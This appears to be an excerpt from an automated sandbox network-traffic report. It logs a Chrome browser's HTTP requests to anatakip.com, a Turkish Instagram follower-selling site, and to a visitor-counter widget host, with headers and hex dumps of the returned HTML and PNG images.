                    2024-05-26 22:57:57 UTC1369INData Raw: 2c 20 31 37 35 2c 20 38 30 29 3b 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 69 6e 69 74 69 61 6c 3b 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 6e 6f 6e 65 3b 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 69 6e 69 74 69 61 6c 3b 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 31 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 38 34 36 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 30 70 78 3b 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 61 6c 6c 20 30 2e 34 73 20 65 61 73 65 20 30 73 3b 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 34 29 20 31 70 78 20 31 70 78 20 34 70 78 3b 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 20 74 6f 75 63 68 2d 61 63 74 69 6f 6e 3a 20 6d 61 6e 69 70 75 6c 61 74
                    Data Ascii: , 175, 80); border-width: initial; border-style: none; border-color: initial; padding: 6px 10px; line-height: 1.846; border-radius: 10px; transition: all 0.4s ease 0s; box-shadow: rgba(0, 0, 0, 0.4) 1px 1px 4px; margin-bottom: 0px; touch-action: manipulat
                    2024-05-26 22:57:57 UTC1369INData Raw: 0a 3c 61 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 69 6e 66 6f 20 62 74 6e 2d 6c 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 77 68 61 74 73 61 70 70 2e 63 6f 6d 2f 73 65 6e 64 3f 70 68 6f 6e 65 3d 39 30 35 34 33 34 33 33 33 34 38 35 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 37 36 2c 20 31 37 35 2c 20 38 30 29 3b 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 69 6e 69 74 69 61 6c 3b 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 6e 6f 6e 65 3b 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 69 6e 69 74 69 61 6c 3b 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 31 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 38 34 36 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 30 70 78
                    Data Ascii: <a class="btn btn-info btn-lg" href="https://api.whatsapp.com/send?phone=905434333485" style="background-color: rgb(76, 175, 80); border-width: initial; border-style: none; border-color: initial; padding: 6px 10px; line-height: 1.846; border-radius: 10px
                    2024-05-26 22:57:57 UTC1369INData Raw: 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 34 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 63 6b 61 67 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 6d 65 22 3e 31 2e 30 30 30 20 49 4e 53 54 41 47 52 41 4d 20 42 45 c4 9e 45 4e c4 b0 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 69 63 65 22 3e 0a 3c 70 3e 3c 73 3e 31 34 30 2e 30 30 20 54 4c 3c 2f 73 3e 26 6e 62 73 70 3b 37 30 2e 30 30 20 54 4c 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 69 6e 66 6f 20 62 74 6e 2d 6c 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 77 68 61 74 73 61 70 70 2e 63 6f 6d 2f 73 65 6e 64 3f 70 68 6f 6e 65 3d 39 30 35 34 33 34 33 33 33 34 38 35 22 20 73 74 79 6c 65 3d 22 62 61 63 6b
                    Data Ascii: iv class="col-md-4"><div class="package"><div class="name">1.000 INSTAGRAM BEEN</div><div class="price"><p><s>140.00 TL</s>&nbsp;70.00 TL</p></div><a class="btn btn-info btn-lg" href="https://api.whatsapp.com/send?phone=905434333485" style="back


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    46192.168.2.549798104.21.27.834433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:57 UTC793OUTGET /assets/logo/logo.png HTTP/1.1
                    Host: anatakip.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: same-origin
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/packages
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _gid=GA1.2.1885107992.1716764258; _ga_T1K5FR27Q6=GS1.1.1716764274.1.0.1716764274.0.0.0; _ga=GA1.1.1095029423.1716764258
                    2024-05-26 22:57:58 UTC742INHTTP/1.1 404 Not Found
                    Date: Sun, 26 May 2024 22:57:58 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                    cache-control: no-store, no-cache, must-revalidate
                    pragma: no-cache
                    vary: Accept-Encoding
                    x-turbo-charged-by: LiteSpeed
                    CF-Cache-Status: BYPASS
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2eOb%2BlozZ4GwQUasM5vJv1lrjv5wMcwIDjAbPkre0ISkbPIgHs2afiGz%2BpWx7EwO9qonNRWt%2FXsBfThnIDhYHI7bQm4n%2B6UBxyQw4PvO8bgmjei8LuOeRY6hp7e6nEk%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15e0148567c7c-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:57:58 UTC627INData Raw: 31 63 37 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 70 61
                    Data Ascii: 1c76<!DOCTYPE html><html lang="tr"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="/assets/bootstrap/css/bootstrap-pa
                    2024-05-26 22:57:58 UTC1369INData Raw: 73 2f 73 74 79 6c 65 2f 70 61 70 65 72 2e 63 73 73 3f 76 3d 76 33 2e 31 2e 35 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6e 70 72 6f 67 72 65 73 73 2f 6e 70 72 6f 67 72 65 73 73 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6c 6f 67 6f 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 41 6e 61 54 61 6b 69 70 20 6b 65 6e 64 69 6e 69 7a 69 20 69 6e 73 74 61 67 72 61 6d 20 65 6e 20 69 79 69 20 70 72 6f 66 69 6c 69 20 68 61 6c 69 6e 65 20 67 65 74 69 72 69 6e
                    Data Ascii: s/style/paper.css?v=v3.1.5"><link rel="stylesheet" href="/assets/nprogress/nprogress.css"><link rel="shortcut icon" href="/assets/logo/favicon.png" type="image/x-icon" /><title>Page Not Found | AnaTakip kendinizi instagram en iyi profili haline getirin
                    2024-05-26 22:57:58 UTC1369INData Raw: 63 6f 6c 6c 61 70 73 65 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 54 6f 67 67 6c 65 20 6e 61 76 69 67 61 74 69 6f 6e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 20 63 6f 6c 6c 61 70 73 65 20 6e 61 76 62 61 72 2d 6c 65 66 74 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 6e 61 76
                    Data Ascii: collapse" aria-expanded="false"><span class="sr-only">Toggle navigation</span><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button></div><div class="navbar-collapse collapse navbar-left"><ul class="nav
                    2024-05-26 22:57:58 UTC1369INData Raw: 3c 68 35 3e 4b 69 6d 6c 65 72 20 4b 75 6c 6c 61 6e 61 62 69 6c 69 72 3c 2f 68 35 3e 0a 3c 70 3e 49 6e 73 74 61 67 72 61 6d 20 c3 bc 79 65 6c 69 c4 9f 69 20 6f 6c 61 6e 20 68 65 72 6b 65 73 20 73 69 73 74 65 6d 69 20 6b 75 6c 6c 61 6e 61 62 69 6c 69 72 2e 20 49 6e 73 74 61 67 72 61 6d 20 68 65 73 61 62 c4 b1 6e c4 b1 7a 6c 61 20 67 69 72 69 c5 9f 20 79 61 70 c4 b1 6e 20 76 65 20 68 65 6d 65 6e 20 6b 75 6c 6c 61 6e 6d 61 79 61 20 62 61 c5 9f 6c 61 79 c4 b1 6e 2e 20 4b 75 6c 6c 61 6e c4 b1 6d 20 c3 bc 63 72 65 74 73 69 7a 64 69 72 2e 20 4b 72 65 64 69 20 73 61 74 c4 b1 6e 20 61 6c 6d 61 64 c4 b1 6b c3 a7 61 20 68 69 c3 a7 62 69 72 20 c3 bc 63 72 65 74 20 c3 b6 64 65 6d 65 7a 73 69 6e 69 7a 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73
                    Data Ascii: <h5>Kimler Kullanabilir</h5><p>Instagram yelii olan herkes sistemi kullanabilir. Instagram hesabnzla giri yapn ve hemen kullanmaya balayn. Kullanm cretsizdir. Kredi satn almadka hibir cret demezsiniz.</p></div><div class
                    2024-05-26 22:57:58 UTC1369INData Raw: 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 63 6f 72 65 2f 63 6f 72 65 2e 6a 73 3f 76 3d 33 2e 31 2e 31 30 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 09 09 09 28 66 75 6e 63 74 69 6f 6e 20 28 69 2c 20 73 2c 20 6f 2c 20 67 2c 20 72 2c 20 61 2c 20 6d 29 20 7b 0a 09 09 09 09 69 5b 27 47 6f 6f 67 6c 65 41 6e 61 6c 79 74 69 63 73 4f 62 6a 65 63 74 27 5d 20 3d 20 72 3b 0a 09 09 09 09 69 5b 72 5d 20 3d 20 69 5b 72 5d 20 7c 7c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 09 09 09 09 09 28 69 5b 72 5d 2e 71 20 3d 20 69 5b 72 5d 2e 71 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 0a 09 09 09 09 7d 2c 20 69 5b 72 5d
                    Data Ascii: pt><script src="/assets/core/core.js?v=3.1.10"></script><script type="text/javascript">(function (i, s, o, g, r, a, m) {i['GoogleAnalyticsObject'] = r;i[r] = i[r] || function () {(i[r].q = i[r].q || []).push(arguments)}, i[r]


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    47192.168.2.549801104.22.75.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:58 UTC589OUTGET /widget/instamark.png HTTP/1.1
                    Host: whos.amung.us
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: cross-site
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:57:58 UTC373INHTTP/1.1 307 Temporary Redirect
                    Date: Sun, 26 May 2024 22:57:58 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    cache-control: no-cache, no-store, must-revalidate
                    location: https://widgets.amung.us/classic/13/1365.png
                    CF-Cache-Status: DYNAMIC
                    Server: cloudflare
                    CF-RAY: 88a15e058a8480e0-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:57:58 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    48192.168.2.549802104.22.75.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:58 UTC589OUTGET /widget/anatakipx.png HTTP/1.1
                    Host: whos.amung.us
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: cross-site
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:57:58 UTC371INHTTP/1.1 307 Temporary Redirect
                    Date: Sun, 26 May 2024 22:57:58 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    cache-control: no-cache, no-store, must-revalidate
                    location: https://widgets.amung.us/classic/00/57.png
                    CF-Cache-Status: DYNAMIC
                    Server: cloudflare
                    CF-RAY: 88a15e06bd02439a-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:57:58 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    49192.168.2.549803104.22.74.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:59 UTC591OUTGET /classic/13/1365.png HTTP/1.1
                    Host: widgets.amung.us
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: cross-site
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:57:59 UTC431INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:57:59 GMT
                    Content-Type: image/png
                    Content-Length: 1703
                    Connection: close
                    last-modified: Sun, 13 Jun 2010 09:03:11 GMT
                    etag: "4c149ecf-6a7"
                    expires: Fri, 24 May 2024 14:02:47 GMT
                    Cache-Control: max-age=2678400
                    access-control-allow-origin: *
                    alt-svc: h3=":443"; ma=86400
                    CF-Cache-Status: HIT
                    Age: 291312
                    Accept-Ranges: bytes
                    Server: cloudflare
                    CF-RAY: 88a15e0beb8f439f-EWR
                    2024-05-26 22:57:59 UTC938INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 51 00 00 00 1d 08 03 00 00 00 e5 cb 70 13 00 00 02 df 50 4c 54 45 ff ff ff be be be 7d 7d 7d b7 b7 b7 ac ac ac c8 c8 c8 c9 c9 c9 8e 8e 8e d2 d2 d2 c1 c1 c1 d4 d4 d4 7a 7a 7a bc bc bc bb bb bb 8b 8b 8b c6 c6 c6 e3 e3 e3 e4 e4 e4 ae ae ae d6 d6 d6 ea ea ea 99 99 99 bf bf bf d3 d3 d3 77 77 77 d1 d1 d1 b9 b9 b9 74 74 74 e7 e7 e7 88 88 88 e1 e1 e1 c7 c7 c7 76 76 76 72 72 72 e2 e2 e2 90 90 90 92 92 92 93 93 93 a5 a5 a5 ad ad ad aa aa aa a8 a8 a8 a6 a6 a6 a4 a4 a4 8d 8d 8d e8 e8 e8 a2 a2 a2 d0 d0 d0 70 70 70 cf cf cf a0 a0 a0 ff ff ff 5c 5c 5c 28 28 28 0c 0c 0c 35 35 35 c1 27 2d 08 08 08 30 30 30 05 05 05 02 02 02 45 45 45 38 38 38 10 10 10 2d 2d 2d 41 41 41 51 51 51 3d 3d 3d 7d 27 2a 68 24 27 58 58 58 b6
                    Data Ascii: PNGIHDRQpPLTE}}}zzzwwwtttvvvrrrppp\\\(((555'-000EEE888---AAAQQQ===}'*h$'XXX
                    2024-05-26 22:57:59 UTC765INData Raw: 71 79 c7 cb b2 9b c8 48 87 b5 ae 7a 4c a8 18 b2 ad 0e f4 fd 69 7b 6a e8 94 7a 30 2a ae 37 a5 31 5b a6 5c 26 1e fb 21 ad 23 ce 34 5c 41 cd c5 66 ea cb df ae ca 0e 3d 6f fe ff 3c f5 18 35 97 98 88 79 3b fe 21 fe 3c 31 9f ad a6 36 c9 a3 92 4c f7 7b 78 10 93 2c 6f 33 32 e8 3a 8a 46 0f b0 a0 2a 17 23 47 ae df ef 9f f1 ce 35 ea 47 bf 9f 96 97 b7 f9 39 5b 22 c0 48 ff fd 06 0e 20 06 41 22 df 8d 84 9e 34 83 44 12 f2 eb ce 5f c1 28 b3 ce e9 f1 1c b8 45 ad 5a fd d3 42 d6 7c f4 b8 87 6a d0 eb 47 c0 70 4f 80 fe d0 8f d5 1e 30 82 96 7e f2 96 3a dd 4c ee b1 f9 98 f4 c2 6d ea 0f 49 92 b6 b2 ee f6 eb 12 a5 d3 d7 4b a0 93 da d3 81 9a d5 ee 10 c9 6a a4 5c a9 0c 72 8f 65 25 67 7d 47 ae 13 af f8 be f1 f9 78 7b 7d 9f 4f 01 c3 7c ed 68 e0 21 b9 6a 78 d0 19 3a 0d d3 74 e6 bd cd
                    Data Ascii: qyHzLi{jz0*71[\&!#4\Af=o<5y;!<16L{x,o32:F*#G5G9["H A"4D_(EZB|jGpO0~:LmIKj\re%g}Gx{}O|h!jx:t


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    50192.168.2.549804104.22.74.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:00 UTC359OUTGET /classic/13/1365.png HTTP/1.1
                    Host: widgets.amung.us
                    Connection: keep-alive
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    Accept: */*
                    Sec-Fetch-Site: none
                    Sec-Fetch-Mode: cors
                    Sec-Fetch-Dest: empty
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:58:00 UTC431INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:58:00 GMT
                    Content-Type: image/png
                    Content-Length: 1703
                    Connection: close
                    last-modified: Sun, 13 Jun 2010 09:03:11 GMT
                    etag: "4c149ecf-6a7"
                    expires: Fri, 24 May 2024 14:02:47 GMT
                    Cache-Control: max-age=2678400
                    access-control-allow-origin: *
                    alt-svc: h3=":443"; ma=86400
                    CF-Cache-Status: HIT
                    Age: 291313
                    Accept-Ranges: bytes
                    Server: cloudflare
                    CF-RAY: 88a15e117d6c4276-EWR
                    2024-05-26 22:58:00 UTC938INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 51 00 00 00 1d 08 03 00 00 00 e5 cb 70 13 00 00 02 df 50 4c 54 45 ff ff ff be be be 7d 7d 7d b7 b7 b7 ac ac ac c8 c8 c8 c9 c9 c9 8e 8e 8e d2 d2 d2 c1 c1 c1 d4 d4 d4 7a 7a 7a bc bc bc bb bb bb 8b 8b 8b c6 c6 c6 e3 e3 e3 e4 e4 e4 ae ae ae d6 d6 d6 ea ea ea 99 99 99 bf bf bf d3 d3 d3 77 77 77 d1 d1 d1 b9 b9 b9 74 74 74 e7 e7 e7 88 88 88 e1 e1 e1 c7 c7 c7 76 76 76 72 72 72 e2 e2 e2 90 90 90 92 92 92 93 93 93 a5 a5 a5 ad ad ad aa aa aa a8 a8 a8 a6 a6 a6 a4 a4 a4 8d 8d 8d e8 e8 e8 a2 a2 a2 d0 d0 d0 70 70 70 cf cf cf a0 a0 a0 ff ff ff 5c 5c 5c 28 28 28 0c 0c 0c 35 35 35 c1 27 2d 08 08 08 30 30 30 05 05 05 02 02 02 45 45 45 38 38 38 10 10 10 2d 2d 2d 41 41 41 51 51 51 3d 3d 3d 7d 27 2a 68 24 27 58 58 58 b6
                    Data Ascii: PNGIHDRQpPLTE}}}zzzwwwtttvvvrrrppp\\\(((555'-000EEE888---AAAQQQ===}'*h$'XXX
                    2024-05-26 22:58:00 UTC765INData Raw: 71 79 c7 cb b2 9b c8 48 87 b5 ae 7a 4c a8 18 b2 ad 0e f4 fd 69 7b 6a e8 94 7a 30 2a ae 37 a5 31 5b a6 5c 26 1e fb 21 ad 23 ce 34 5c 41 cd c5 66 ea cb df ae ca 0e 3d 6f fe ff 3c f5 18 35 97 98 88 79 3b fe 21 fe 3c 31 9f ad a6 36 c9 a3 92 4c f7 7b 78 10 93 2c 6f 33 32 e8 3a 8a 46 0f b0 a0 2a 17 23 47 ae df ef 9f f1 ce 35 ea 47 bf 9f 96 97 b7 f9 39 5b 22 c0 48 ff fd 06 0e 20 06 41 22 df 8d 84 9e 34 83 44 12 f2 eb ce 5f c1 28 b3 ce e9 f1 1c b8 45 ad 5a fd d3 42 d6 7c f4 b8 87 6a d0 eb 47 c0 70 4f 80 fe d0 8f d5 1e 30 82 96 7e f2 96 3a dd 4c ee b1 f9 98 f4 c2 6d ea 0f 49 92 b6 b2 ee f6 eb 12 a5 d3 d7 4b a0 93 da d3 81 9a d5 ee 10 c9 6a a4 5c a9 0c 72 8f 65 25 67 7d 47 ae 13 af f8 be f1 f9 78 7b 7d 9f 4f 01 c3 7c ed 68 e0 21 b9 6a 78 d0 19 3a 0d d3 74 e6 bd cd
                    Data Ascii: qyHzLi{jz0*71[\&!#4\Af=o<5y;!<16L{x,o32:F*#G5G9["H A"4D_(EZB|jGpO0~:LmIKj\re%g}Gx{}O|h!jx:t


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    51192.168.2.549806104.21.27.834433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:02 UTC835OUTGET /blog HTTP/1.1
                    Host: anatakip.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    sec-ch-ua-platform: "Windows"
                    Upgrade-Insecure-Requests: 1
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Sec-Fetch-Site: none
                    Sec-Fetch-Mode: navigate
                    Sec-Fetch-Dest: document
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _gid=GA1.2.1885107992.1716764258; _ga_T1K5FR27Q6=GS1.1.1716764274.1.1.1716764277.0.0.0; _ga=GA1.2.1095029423.1716764258
                    2024-05-26 22:58:02 UTC730INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:58:02 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                    cache-control: no-store, no-cache, must-revalidate
                    pragma: no-cache
                    vary: Accept-Encoding
                    x-turbo-charged-by: LiteSpeed
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tog3ZAtvpwqV6Ha8FeLN5aSsZ0U8i9u2QegUuwzloDn1ukMPV3a4wk1wru0dj2najbItsBVRwpClHogX5NHwvhHjKE0O4qTqQixD434qOEAPIT0KT%2FQbOt59aNssuFE%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15e1d784e424c-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:58:02 UTC639INData Raw: 31 66 35 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 70 61
                    Data Ascii: 1f5a<!DOCTYPE html><html lang="tr"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="/assets/bootstrap/css/bootstrap-pa
